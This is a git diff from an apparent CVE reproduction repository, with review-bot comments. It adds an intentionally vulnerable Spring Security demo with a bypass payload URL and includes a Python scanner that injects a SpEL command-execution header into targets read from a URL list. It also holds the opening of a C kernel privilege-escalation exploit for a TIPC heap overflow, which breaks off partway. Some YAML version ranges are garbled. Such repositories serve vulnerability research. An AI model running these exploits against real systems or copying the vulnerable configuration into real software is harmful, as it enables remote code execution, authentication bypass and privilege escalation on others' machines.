@@ -0,0 +1,68 @@ + + + 4.0.0 + + org.springframework.boot + spring-boot-starter-parent + 2.7.0 + + + cc.saferoad + CVE-2022-22978 + 0.0.1-SNAPSHOT + jar + CVE-2022-22978 + CVE-2022-22978 + + 1.8 + 5.6.3 + + + + org.springframework.boot + spring-boot-starter-web + + + + org.springframework.boot + spring-boot-starter-tomcat + provided + + + org.springframework.boot + spring-boot-starter-test + test + + + org.springframework.boot + spring-boot-starter-security + + + org.springframework.boot + spring-boot-starter-thymeleaf + + + + + + + org.springframework.boot + spring-boot-maven-plugin + + + -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8989 + + + + + org.apache.maven.plugins + maven-surefire-plugin + + true + + + + + + diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java new file mode 100644 index 00000000..2415af49 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java @@ -0,0 +1,16 @@ +package cc.saferoad.config; + +import org.springframework.context.annotation.Configuration; +import org.springframework.security.config.annotation.web.builders.HttpSecurity; +import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; +import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter; + +@Configuration +@EnableWebSecurity +public class SpringSecurityConfig extends WebSecurityConfigurerAdapter { + + @Override + protected void configure(HttpSecurity httpSecurity) throws Exception{ + httpSecurity.authorizeRequests().regexMatchers("/admin/.*").authenticated(); + } +} 
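Review bot: The spring-boot-maven-plugin configuration carries `-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8989`; with `suspend=y` the JVM blocks at startup until a debugger attaches, and on the Java 8 toolchain this pom targets (`1.8`) a bare `address=8989` listens on every interface, so anything that launches the app through this plugin (the Dockerfile is not in this chunk) would either hang or expose a JDWP port. Drop the argument from the committed build, or at least make it `address=localhost:8989` with `suspend=n`. The XML element names were lost in this rendering, so I am reading the `5.6.3` entry as a Spring Security version override of the 2.7.0 parent and the `true` under maven-surefire-plugin as `skipTests`; if so, both deserve a one-line XML comment stating they are deliberate for reproducing CVE-2022-22978, since the parent would otherwise manage a newer Spring Security.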
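Review bot: `regexMatchers("/admin/.*")` is exactly the shape the CVE-2022-22978 advisory describes — a `.`-based pattern that, before the fix, does not match a path carrying an encoded line terminator, so the request falls through with no rule at all — but nothing in SpringSecurityConfig says this is deliberate. Add a comment above the `configure` override such as `// Intentionally vulnerable: on Spring Security 5.6.3 '.' does not match line terminators, so a path like /admin/index%0a escapes this rule (CVE-2022-22978). Fixed in 5.5.7/5.6.4; real code should use antMatchers/mvcMatchers or a fixed release.` It is also worth noting in that comment that there is no `.anyRequest()` fallback, so any path the regex fails to match is simply unprotected, which is what makes the bypass observable in this demo.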
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java new file mode 100644 index 00000000..f32b5613 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java @@ -0,0 +1,21 @@ +package cc.saferoad.controller; + +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.GetMapping; +import org.springframework.web.bind.annotation.RestController; + +/*@RestController*/ +@Controller +public class Demo { + @GetMapping("/admin/*") + public String Manage(){ + /*return "Manage page";*/ + return "manage"; + } + + @GetMapping("/") + public String User(){ + /* return "Hello bro";*/ + return "index"; + } +} diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java new file mode 100644 index 00000000..cc5f37e2 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java @@ -0,0 +1,13 @@ +package cc.saferoad.cve202222978; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication(scanBasePackages = {"cc.saferoad"}) +public class Cve202222978Application { + + public static void main(String[] args) { + SpringApplication.run(Cve202222978Application.class, args); + } + +} diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java new file mode 100644 index 00000000..08cf3001 --- /dev/null 
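Review bot: `Manage` and `User` in Demo.java are capitalised method names, and `RestController` is imported but only referenced from a commented-out annotation; the commented-out `return` strings are dead text as well. Rename them to `manage()` and `user()`, drop the unused import and the `/* ... */` leftovers, and give the class a one-line comment that `/admin/*` is the page the security rule in SpringSecurityConfig is meant to protect, so the link between controller and rule is visible from here.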
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java @@ -0,0 +1,15 @@ +package cc.saferoad.cve202222978; + +import org.springframework.boot.builder.SpringApplicationBuilder; +import org.springframework.boot.web.servlet.support.SpringBootServletInitializer; +import org.springframework.context.annotation.ComponentScan; + +@ComponentScan(basePackages = {"cc.saferoad"}) +public class ServletInitializer extends SpringBootServletInitializer { + + @Override + protected SpringApplicationBuilder configure(SpringApplicationBuilder application) { + return application.sources(Cve202222978Application.class); + } + +} diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties @@ -0,0 +1 @@ + diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html new file mode 100644 index 00000000..682abdc5 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html @@ -0,0 +1,14 @@ + + + + + CVE-2022-22978 + + +

+ CVE-2022-22978 Demo via Spring security 5.6.3
+ Manage page:
/admin/index
+Payload: http://localhost:8080/admin/index%0a +

+ + \ No newline at end of file diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html new file mode 100644 index 00000000..eeb40f2a --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html @@ -0,0 +1,10 @@ + + + + + Manage + + +

This is manage page

+ + \ No newline at end of file diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java new file mode 100644 index 00000000..f24ec389 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java @@ -0,0 +1,13 @@ +package cc.saferoad.cve202222978; + +import org.junit.jupiter.api.Test; +import org.springframework.boot.test.context.SpringBootTest; + +@SpringBootTest +class Cve202222978ApplicationTests { + + @Test + void contextLoads() { + } + +} diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java new file mode 100644 index 00000000..864b8573 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java @@ -0,0 +1,17 @@ +package cc.saferoad.cve202222978; + +import org.junit.jupiter.api.Test; +import org.springframework.mock.web.MockHttpServletRequest; +import org.springframework.security.web.util.matcher.RegexRequestMatcher; +import static org.assertj.core.api.Assertions.assertThat; + +public class RegexRequestMatcherTests { + + @Test + public void matchesWithLineFeed() { + RegexRequestMatcher matcher = new RegexRequestMatcher(".*", null); + MockHttpServletRequest request = new MockHttpServletRequest("GET", "/blah%0d"); + request.setServletPath("/blah\r"); + assertThat(matcher.matches(request)).isTrue(); + } +} diff --git a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml new file mode 100644 index 00000000..d24bc4c4 --- /dev/null 
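Review bot: `matchesWithLineFeed` asserts that `.*` matches a servlet path ending in `\r`, which is the behaviour of the fixed releases; against the 5.6.3 this project pins, `.` does not match a line terminator and `matches()` returns false, so the test fails as written — it only stays quiet if surefire really is configured to skip tests, which the stripped pom rendering suggests but does not prove. Either flip it to `assertThat(matcher.matches(request)).isFalse();` with a comment that it documents the vulnerable behaviour, or keep it as a regression test and run it against a fixed version. Name it for what it checks, e.g. `carriageReturnEscapesDotPattern`, and add a one-line Javadoc citing CVE-2022-22978 so a reader knows why a `\r` in a servlet path is being tested at all.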
+++ b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml @@ -0,0 +1,22 @@ +id: CVE-2022-22978 +source: + https://github.com/DeEpinGh0st/CVE-2022-22978 +info: + name: Authorization Bypass in RegexRequestMatcher of Spring Security + severity: critical + description: | + 在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时,攻击者可以通过构造恶意数据包绕过身份认证 + scope-of-influence: + Spring Security 5.5.x prior to 5.5.75.5.6 + Spring Security 5.6.x prior to 5.6.45.6.3 + Spring Security Earlier unsupported versions + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-22978 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22978 + cwe-id: None + cnvd-id: None + kve-id: None + tags: cve2022, spring-security \ No newline at end of file diff --git a/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py b/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py index fde21239..2932dc34 100644 --- a/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py +++ b/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py 
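Review bot: The two `scope-of-influence` lines read `prior to 5.5.75.5.6` and `prior to 5.6.45.6.3`, which look like two version strings run together; the fixed releases for CVE-2022-22978 are 5.5.7 and 5.6.4, so these should read `Spring Security 5.5.x prior to 5.5.7` and `Spring Security 5.6.x prior to 5.6.4` (the trailing `5.5.6`/`5.6.3` may have been meant as the last vulnerable version and, if kept, belongs in its own field). The `cwe-id`, `cnvd-id` and `kve-id` entries are the literal string `None`; if the schema permits it, leave them empty or fill `cwe-id` from the NVD reference already listed. The `description` is the only non-English field in the record, which is inconsistent with `name` and the rest of the file.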
@@ -1,59 +1,59 @@ -import requests -import sys -import threading -import urllib3 -urllib3.disable_warnings() - - -def scan(txt,cmd): - - payload=f'T(java.lang.Runtime).getRuntime().exec("{cmd}")' - - data ='test' - headers = { - 'spring.cloud.function.routing-expression':payload, - 'Accept-Encoding': 'gzip, deflate', - 'Accept': '*/*', - 'Accept-Language': 'en', - 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', - 'Content-Type': 'application/x-www-form-urlencoded' - } - path = '/functionRouter' - f = open(txt) - urllist=f.readlines() - - for url in urllist : - url = url.strip('\n') - all = url + path - try: - req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3) - code =req.status_code - text = req.text - rsp = '"error":"Internal Server Error"' - - if code == 500 and rsp in text: - print ( f'[+] { url } is vulnerable' ) - poc_file = open('vulnerable.txt', 'a+') - poc_file.write(url + '\n') - poc_file.close() - else: - print ( f'[-] { url } not vulnerable' ) - - except requests.exceptions.RequestException: - print ( f'[-] { url } detection timed out' ) - continue - except: - print ( f'[-] { url } error' ) - continue - - - -if __name__ == '__main__' : - try: - cmd1 =sys.argv[1] - t = threading . 
Thread ( target = scan ( cmd1 , 'whoami' ) ) - t.start() - except: - print ( 'Usage:' ) - print('python poc.py url.txt') +import requests +import sys +import threading +import urllib3 +urllib3.disable_warnings() + + +def scan(txt,cmd): + + payload=f'T(java.lang.Runtime).getRuntime().exec("{cmd}")' + + data ='test' + headers = { + 'spring.cloud.function.routing-expression':payload, + 'Accept-Encoding': 'gzip, deflate', + 'Accept': '*/*', + 'Accept-Language': 'en', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', + 'Content-Type': 'application/x-www-form-urlencoded' + } + path = '/functionRouter' + f = open(txt) + urllist=f.readlines() + + for url in urllist : + url = url.strip('\n') + all = url + path + try: + req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3) + code =req.status_code + text = req.text + rsp = '"error":"Internal Server Error"' + + if code == 500 and rsp in text: + print ( f'[+] { url } is vulnerable' ) + poc_file = open('vulnerable.txt', 'a+') + poc_file.write(url + '\n') + poc_file.close() + else: + print ( f'[-] { url } not vulnerable' ) + + except requests.exceptions.RequestException: + print ( f'[-] { url } detection timed out' ) + continue + except: + print ( f'[-] { url } error' ) + continue + + + +if __name__ == '__main__' : + try: + cmd1 =sys.argv[1] + t = threading . Thread ( target = scan ( cmd1 , 'whoami' ) ) + t.start() + except: + print ( 'Usage:' ) + print('python poc.py url.txt') pass \ No newline at end of file diff --git a/cve/java-spring/2022/CVE-2022-22963/README.md b/cve/java-spring/2022/CVE-2022-22963/README.md index 0ab23368..0440d772 100644 --- a/cve/java-spring/2022/CVE-2022-22963/README.md +++ b/cve/java-spring/2022/CVE-2022-22963/README.md 
@@ -1,10 +1,10 @@
-# CVE-2022-22963
-CVE-2022-22963 PoC
-
-Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable.
-
-# REF
-https://github.com/dinosn/CVE-2022-22963
-https://avd.aliyun.com/search?q=CVE-2022-22963
-https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html,
+# CVE-2022-22963
+CVE-2022-22963 PoC
+
+Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable.
+
+# REF
+https://github.com/dinosn/CVE-2022-22963
+https://avd.aliyun.com/search?q=CVE-2022-22963
+https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html,
 https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52
\ No newline at end of file
diff --git a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml
index 496e1ad2..bd94e2e1 100644
--- a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml
+++ b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml
@@ -1,20 +1,20 @@
-id: CVE-2022-22963
-source: https://github.com/dinosn/CVE-2022-22963
-info:
- name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。
- severity: critical
- description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。
- scope-of-influence: Spring Cloud Function<3.1.7
- reference:
- - https://github.com/dinosn/CVE-2022-22963
- - https://avd.aliyun.com/search?q=CVE-2022-22963
- - https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html
- - https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-22963
- cwe-id: CWE-94
- cnvd-id: None
- kve-id: None
- tags: cve2022, spring-framework, 表达式注入
+id: CVE-2022-22963
+source: https://github.com/dinosn/CVE-2022-22963
+info:
+ name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。
+ severity: critical
+ description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。
+ scope-of-influence: Spring Cloud Function<3.1.7
+ reference:
+ - https://github.com/dinosn/CVE-2022-22963
+ - https://avd.aliyun.com/search?q=CVE-2022-22963
+ - https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html
+ - https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-22963
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
+ tags: cve2022, spring-framework, 表达式注入
diff --git a/cve/linux-kernel/2021/CVE-2021-42008/README.md b/cve/linux-kernel/2021/CVE-2021-42008/README.md
index 9d3bcccf..31dc9683 100644
--- a/cve/linux-kernel/2021/CVE-2021-42008/README.md
+++ b/cve/linux-kernel/2021/CVE-2021-42008/README.md
@@ -1,30 +1,30 @@ -# CVE-2021-42008 - -## 漏洞描述 -drivers/net/hamradio/6pack.c中 decode_data() 函数存在越界写漏洞,用户需具备 CAP_NET_ADMIN 权限。sixpack_decode() 可多次调用 decode_data() ,对输入进行解码并保存到 sixpack->cooked_buf ,sixpack->rx_count_cooked成员充当访问 sixpack->cooked_buf 的下标,确定写入解码字节的目标偏移。问题是如果多次调用decode_data(),rx_count_cooked就会一直递增,直到超过 cooked_buf 的长度(400字节),导致越界写。 - -## 测试环境配置 -Linux-v5.13.12 测试环境见`env/` - -原exp作者测试环境为 Debian 11 - Kernel 5.10.0-8-amd64,如果适配其他版本,需修改 sp->cooked_buf 和下一个对象的距离。 - -编译选项:CONFIG_6PACK=y CONFIG_AX25=y - -在编译时将.config中的CONFIG_E1000和CONFIG_E1000E,变更为=y。 - -本文exp用到了userfaultfd,但5.11版本开始限制了用户对userfaultfd的使用,所以需根据 first patch 和 second patch 补丁进行回退(去掉SYSCALL_DEFINE1(userfaultfd, int, flags) 函数开头的权限判断语句即可)。 - -```bash -$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-5.13.12.tar.xz -$ tar -xvf linux-5.13.12.tar.xz -# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。 -$ make -j32 -$ make all -$ make modules -# 编译出的bzImage目录:/arch/x86/boot/bzImage。 -``` - -## 保护机制 -KASLR / SMEP / SMAP / PTI。开启 CONFIG_SLAB_FREELIST_RANDOM / CONFIG_SLAB_FREELIST_HARDENED / CONFIG_HARDENED_USERCOPY - +# CVE-2021-42008 + +## 漏洞描述 +drivers/net/hamradio/6pack.c中 decode_data() 函数存在越界写漏洞,用户需具备 CAP_NET_ADMIN 权限。sixpack_decode() 可多次调用 decode_data() ,对输入进行解码并保存到 sixpack->cooked_buf ,sixpack->rx_count_cooked成员充当访问 sixpack->cooked_buf 的下标,确定写入解码字节的目标偏移。问题是如果多次调用decode_data(),rx_count_cooked就会一直递增,直到超过 cooked_buf 的长度(400字节),导致越界写。 + +## 测试环境配置 +Linux-v5.13.12 测试环境见`env/` + +原exp作者测试环境为 Debian 11 - Kernel 5.10.0-8-amd64,如果适配其他版本,需修改 sp->cooked_buf 和下一个对象的距离。 + +编译选项:CONFIG_6PACK=y CONFIG_AX25=y + +在编译时将.config中的CONFIG_E1000和CONFIG_E1000E,变更为=y。 + +本文exp用到了userfaultfd,但5.11版本开始限制了用户对userfaultfd的使用,所以需根据 first patch 和 second patch 补丁进行回退(去掉SYSCALL_DEFINE1(userfaultfd, int, flags) 函数开头的权限判断语句即可)。 + +```bash +$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-5.13.12.tar.xz +$ tar -xvf linux-5.13.12.tar.xz +# KASAN: 设置 make 
menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。 +$ make -j32 +$ make all +$ make modules +# 编译出的bzImage目录:/arch/x86/boot/bzImage。 +``` + +## 保护机制 +KASLR / SMEP / SMAP / PTI。开启 CONFIG_SLAB_FREELIST_RANDOM / CONFIG_SLAB_FREELIST_HARDENED / CONFIG_HARDENED_USERCOPY + 引用自[bsauce](https://www.jianshu.com/p/d4d2874ed356) \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-43267/exploit.c b/cve/linux-kernel/2021/CVE-2021-43267/exploit.c index c8793f63..15558149 100644 --- a/cve/linux-kernel/2021/CVE-2021-43267/exploit.c +++ b/cve/linux-kernel/2021/CVE-2021-43267/exploit.c 
@@ -1,749 +1,749 @@ -/* - * Local PoC exploit for CVE-2021-43267 [1] - * - * I want to see someone make a remote exploit for this. - * - * Only really tested on my local copy of 5.15. But given that you need the - * TIPC module loaded it is unlikely scriptkiddies will have a use for this. - * - * Exploit is a bit CTF quality. Feel free to send me revised copies. - * - * Enjoy! - * - * [1] https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow- - * allows-arbitrary-code-execution/ - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -// these are offsets for my kernel, not yours -#define PTM_UNIX98_OPS 0x127f840 // \__ no exported syms, look for xref to str -#define PTS_UNIX98_OPS 0x127f960 // / `Couldn't allocate Unix98 ptm driver` -#define MODPROBE_PATH 0x16500E0 // has symbol -#define GADGET_WRITE32 0x2c51f5 // 31 c0 48 89 32 c3 -#define GADGET_RET 0x2c51fa // c3 - -// good numbers -#define KEY_SIZE 956 -#define MSG_COUNT 2048 -#define BODY_SIZE 976 -#define SMASH_SIZE 32 -#define TRIES_MAX 8 -#define NEXT_OFFSET 0x8000 - -// some constants -#define NODE_ID 0x11223344 -#define MTYPE 0xAB /* Ac1db34v3rz */ -#define SPRAY_TTY_CNT 0x40 -#define TTY_MAGIC 0x5401 -#define TIPC_UDP_PORT 6118 -#define MSG_COPY 040000 - -// TIPC crap -#define TIPC_VERSION 2 - -// user messages -#define LINK_PROTOCOL 7 -#define LINK_CONFIG 13 - -// message types -#define STATE_MSG 0 -#define RESET_MSG 1 -#define ACTIVATE_MSG 2 -#define MSG_CRYPTO 14 - -// media types -#define MEDIA_TYPE_UDP 3 - -// w0 -#define hdr_msg_size(v) ((v) & 0x1ffff) -#define hdr_size(v) ((v & 0xf) << 21) -#define hdr_user(v) ((v & 0xf) << 25) -#define hdr_nonseq(v) ((v & 1) << 20) -#define hdr_version(v) ((v & 7) << 29) - -// w1 -#define hdr_msg_type(v) ((v & 7) << 29) - -// w2 -#define hdr_link_level_seq(v) (v & 0xffff) - -// w4 -#define hdr_next_send_pkt(v) (v & 0xffff) - -// w5 -#define 
hdr_media_id(v) (v & 0xff) -#define hdr_session_number(v) ((v & 0xffff) << 16) - -// prototypes -struct message_t { - long type; - uint8_t body[BODY_SIZE]; -}; - -// globals -int g_sockfd = 0; -struct sockaddr_in g_sockaddr; - -// utility -#define info(fmt, args...) report('$', false, fmt, ## args) -#define infov(fmt, args...) report('~', false, fmt, ## args) -#define maybe(fmt, args...) report('?', false, fmt, ## args) -#define fatal(fmt, args...) report('!', true, fmt, ## args) -#define info_value64(name, value) infov("%-24s: %016lx", name, value) - -void report(char indicator, bool error, const char *fmt, ...) { - FILE *stream = (error) ? stderr : stdout; - va_list a; - va_start(a, fmt); - fprintf(stream, "[%c] %s", indicator, (error) ? "ERROR: " : ""); - vfprintf(stream, fmt, a); - fprintf(stream, "\n"); - va_end(a); - - if (error) { - exit(-1); // all errors are fatal - } -} - -void usage(char *prog) { - printf("usage: %s \n\n", prog); -} - -static inline void write64(uint8_t *p, uint64_t v) { - *(uint64_t*)(p) = v; -} - -static inline uint64_t read64(uint8_t *p) { - return *(uint64_t*)(p); -} - -#define be32 htonl - -// netlink -int netlink_send( - uint16_t type, uint16_t flags, uint32_t seq, - uint8_t* pkt, size_t pkt_len, - uint8_t **reply_buf, size_t *reply_sz -) { - int sock_fd; - struct sockaddr_nl sa; - memset(&sa, 0, sizeof(struct sockaddr_nl)); - sa.nl_family = AF_NETLINK; - - size_t pkt_full_len = sizeof(struct nlmsghdr) + pkt_len; - uint8_t *pkt_full = malloc(pkt_full_len); - memset(pkt_full, 0, pkt_full_len); - memcpy(pkt_full + sizeof(struct nlmsghdr), pkt, pkt_len); - - struct nlmsghdr *netlink_hdr = (struct nlmsghdr*)(pkt_full); - netlink_hdr->nlmsg_len = pkt_full_len; - netlink_hdr->nlmsg_type = type; - netlink_hdr->nlmsg_flags = flags; - netlink_hdr->nlmsg_seq = seq; - netlink_hdr->nlmsg_pid = getpid(); - - if ((sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_GENERIC)) < 0) { - perror("socket"); - return -1; - } - - if (bind(sock_fd, (struct 
sockaddr*)&sa, sizeof(sa)) < 0) { - perror("bind"); - return -1; - } - - ssize_t r = sendto( - sock_fd, pkt_full, pkt_full_len, 0, - (struct sockaddr*)&sa, sizeof(struct sockaddr_nl) - ); - - if (r < 0) { - perror("sendto"); - return -1; - } - - free(pkt_full); - - if (reply_buf != NULL) { - struct msghdr m; - memset(&m, 0, sizeof(struct msghdr)); - m.msg_iovlen = 1; - m.msg_iov = malloc(sizeof(struct iovec)); - m.msg_iov->iov_base = malloc(0x1000); - m.msg_iov->iov_len = 0x1000; - - size_t nread; - - if ((nread = recvmsg(sock_fd, &m, 0)) < 0) { - goto error; - } - - if (m.msg_iovlen != 1) { - goto error; - } - - *reply_sz = nread; - *reply_buf = malloc(*reply_sz); - memcpy(*reply_buf, m.msg_iov->iov_base, *reply_sz); - free(m.msg_iov->iov_base); - } - - close(sock_fd); - return 0; - -error: - close(sock_fd); - return -1; -} - -int netlink_enable_tipc_udp(char *str_ip_address) { - uint8_t pkt_ctrl[]={ - 0x03, 0x01, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, - 0x10, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x02, 0x00, - 0x54, 0x49, 0x50, 0x43, 0x76, 0x32, 0x00, 0x00 - }; - - uint8_t *nl_reply; - size_t nl_reply_len = 0; - uint32_t ip_addr; - uint32_t seq; - int r; - - seq = time(NULL); - - ip_addr = inet_addr(str_ip_address); - if (ip_addr == INADDR_NONE) { - fatal("invalid ip address given"); - } - - r = netlink_send( - NLMSG_MIN_TYPE, (NLM_F_REQUEST | NLM_F_ACK), seq, - pkt_ctrl, sizeof(pkt_ctrl), &nl_reply, &nl_reply_len - ); - - if(r < 0) { - fatal("failed to send netlink control message."); - } - - if (nl_reply_len == 0) { - fatal("did not get netlink control message reply."); - } - - if (*(uint32_t*)(nl_reply + 0x10) == 0xfffffffe) { - fatal("tipc support not available."); - } - - uint16_t nlmsg_type = 0; - off_t pos = 0x14; - - while(pos < nl_reply_len - 4) { - struct nlattr *attr = (struct nlattr*)(nl_reply + pos); - if (attr->nla_type == 1) { - nlmsg_type = *(uint16_t*)(nl_reply + pos + 4); - break; - } - pos += attr->nla_len; - if ((attr->nla_len % 4) != 0) { - pos += 4 - 
(attr->nla_len % 4); - } - } - - if (nlmsg_type == 0) { - fatal("could not find tipc netlink message type."); - } - - uint8_t pkt_tipc_enable_udp[]={ - 0x03, 0x01, 0x00, 0x00, 0x40, 0x00, 0x01, 0x80, - 0x0d, 0x00, 0x01, 0x00, 0x75, 0x64, 0x70, 0x3a, - 0x55, 0x44, 0x50, 0x31, 0x00, 0x00, 0x00, 0x00, - 0x2c, 0x00, 0x04, 0x80, 0x14, 0x00, 0x01, 0x00, - 0x02, 0x00, 0x17, 0xe6, 0x00, 0x00, 0x00, 0x00, // <-- +0x24 = ip - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x14, 0x00, 0x02, 0x00, 0x02, 0x00, 0x17, 0xe6, - 0xe4, 0x00, 0x12, 0x67, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00 - }; - - *(uint32_t*)(pkt_tipc_enable_udp + 0x24) = ip_addr; - - r = netlink_send( - nlmsg_type, (NLM_F_REQUEST | NLM_F_ACK), seq, - pkt_tipc_enable_udp, sizeof(pkt_tipc_enable_udp), NULL, NULL - ); - - if (r < 0) { - fatal("failed to send netlink tipc udp enable message."); - } - - // the right way is to read back a netlink reply and check if this worked.. - // I chose to go with the scientifically proven method of big chillin' - sleep(2); - - return 0; -} - -// tipc packet routines -void gen_tipc_hdr( - uint8_t *o, - uint32_t w0, uint32_t w1, uint32_t w2, - uint32_t w3, uint32_t w4, uint32_t w5 -) { - uint32_t* o32 = (uint32_t*)o; - o32[0] = be32(w0); - o32[1] = be32(w1); - o32[2] = be32(w2); - o32[3] = be32(w3); - o32[4] = be32(w4); - o32[5] = be32(w5); -} - -ssize_t tipc_send(uint8_t *buf, size_t sz) { - return sendto( - g_sockfd, buf, sz, 0, (struct sockaddr*)&g_sockaddr, sizeof(g_sockaddr) - ); -} - -void tipc_discover() { - 